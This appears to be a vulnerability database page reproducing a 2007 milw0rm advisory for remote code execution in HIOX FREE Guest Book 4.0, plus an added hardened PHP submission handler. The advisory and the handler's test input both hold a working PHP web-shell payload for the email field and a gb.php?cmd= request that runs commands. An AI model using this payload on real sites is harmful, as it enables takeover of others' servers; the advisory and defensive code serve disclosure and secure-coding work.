vendor: HIOX FREE Guest Book
by: Dj7xpl
N/A
CVSS
N/A
Remote Code Execution Vulnerability
CWE
Product Name: HIOX FREE Guest Book
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

HIOX FREE Guest Book Remote Code Execution Vulnerability

The vulnerability allows a remote attacker to execute arbitrary commands on the target system. Exploitation involves opening the guestbook in a browser, submitting PHP code in the email field of an entry, and then requesting gb.php with the command passed in the cmd URL parameter.
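
A hardened submission handler for this class of bug, as an added example that is not HIOX Guest Book code and not part of the original advisory. It assumes the flaw comes from submitted fields reaching a file that PHP later executes; the field names, the `GB_STORE` path and the `gb_*` function names are hypothetical, and it needs PHP 7.4 or later.

```php
<?php
// Added example: hypothetical hardened submit handler, not HIOX Guest Book code.
// Assumption: the flaw exists because submitted fields reach a file that the
// web server runs through the PHP interpreter.

// Assumed storage path outside the web root, so it cannot be requested or run.
const GB_STORE = __DIR__ . '/../data/guestbook.jsonl';

// Return a cleaned entry, or null if any field fails validation.
function gb_validate(array $in): ?array
{
    foreach (['name', 'email', 'message'] as $k) {
        if (!is_string($in[$k] ?? null)) {
            return null; // missing field or array-valued parameter
        }
    }
    $email = filter_var(trim($in['email']), FILTER_VALIDATE_EMAIL);
    $name  = trim($in['name']);
    $msg   = trim($in['message']);
    if ($email === false || $name === '' || strlen($name) > 64
        || $msg === '' || strlen($msg) > 2000) {
        return null;
    }
    return ['name' => $name, 'email' => $email, 'message' => $msg, 'ts' => time()];
}

// Append the entry as one JSON line: stored as data, never inside a .php file.
function gb_store(array $entry, string $path = GB_STORE): bool
{
    $line = json_encode($entry, JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE) . "\n";
    return file_put_contents($path, $line, FILE_APPEND | LOCK_EX) !== false;
}

// Render one stored entry; every field is HTML-encoded on output.
function gb_render(array $e): string
{
    $h = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p><b>' . $h($e['name']) . '</b> &lt;' . $h($e['email']) . '&gt;<br>'
         . nl2br($h($e['message'])) . '</p>';
}

// Constructed sample input: the email value from step [2] of the advisory,
// followed by an ordinary entry.
$bad  = gb_validate(['name' => 'x', 'email' => '<?php passthru($_GET[cmd]);?>@yahoo.com', 'message' => 'hi']);
$good = gb_validate(['name' => 'Ann', 'email' => 'ann@example.com', 'message' => 'Nice site']);
var_dump($bad === null);
echo gb_render($good), "\n";
```

The three controls are independent: strict validation rejects the submitted value, storage as data outside the web root means nothing the visitor typed is ever interpreted, and output encoding covers any field that legitimately contains markup characters.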

Mitigation:

Exploit-DB raw data:

+========================I=R=A=N============================+

                     HGB Version 4.0 

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Author :

Dj7xpl / Dj7xpl[at]Yahoo[dot]com

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Type :

Remote Code Execution Vulnerability

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Product / Vendor :

HIOX FREE Guest Book

http://www.hscripts.com/scripts/php/guestbook.php

=========================I=R=A=N=============================

+========================I=R=A=N============================+

Bug :

[1] Open Target By Browser

[2] Insert Bad Code In Email                           E.g :   <?php passthru($_GET[cmd]);?>@yahoo.com

[3] See Bad C0de   :  http://[Targe]/[Path]/gb.php     E.g   :  http://dj7xpl.ir/hgb/gb.php?cmd=dir

=========================I=R=A=N=============================

#Iran_e Sarbolande Man Sarboland Mimanad
#Sp Tnx : str0ke

# milw0rm.com [2007-04-10]